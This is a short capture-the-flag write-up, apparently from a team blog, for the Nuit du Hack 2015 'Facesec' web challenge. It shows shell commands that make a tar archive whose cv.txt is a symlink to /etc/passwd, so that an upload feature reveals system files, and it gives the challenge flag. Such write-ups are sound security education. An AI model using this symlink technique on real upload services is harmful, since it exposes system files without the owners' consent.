QUALS_NDH 2k15 | Facesec WEB 100 [WRITEUP]

This task is a web task worth 100 points from the Nuit du Hack qualifications.
We are given a website that lets you upload txt files for a cover letter, and a motivation letter. (cv.txt, motiv.txt)
It is also possible to a tar file containing both files.
Once you uploaded them, you can see them in your profile.
It is possible to add symlinks to a tar file. We tried to put a symlink to /etc/passwd, and uploaded it.

xer@suicune:~/www/writeup/2015/ndh$ ln -s /etc/passwd cv.txt
xer@suicune:~/www/writeup/2015/ndh$ echo -ne "The game" > motiv.txt
xer@suicune:~/www/writeup/2015/ndh$ tar cvf pwn.tar *.txt
cv.txt
motiv.txt

It worked.

/etc/passwd

Flag: W00tSymL1nkAttackStillW0rksIn2k15

— XeR

Votre commentaire Annuler la réponse.

Entrez votre commentaire...

Entrez vos coordonnées ci-dessous ou cliquez sur une icône pour vous connecter:

E-mail (obligatoire) (adresse strictement confidentielle)

Nom (obligatoire)

Site web

Vous commentez à l’aide de votre compte WordPress.com. ( Déconnexion / Changer )

Vous commentez à l’aide de votre compte Facebook. ( Déconnexion / Changer )

Annuler

Connexion à %s

Hexpresso

irc.swordarmor.fr/6667 #Hexpresso

QUALS_NDH 2k15 | Facesec WEB 100 [WRITEUP]

Votre commentaire Annuler la réponse.

Share this:

WordPress:

Votre commentaire Annuler la réponse.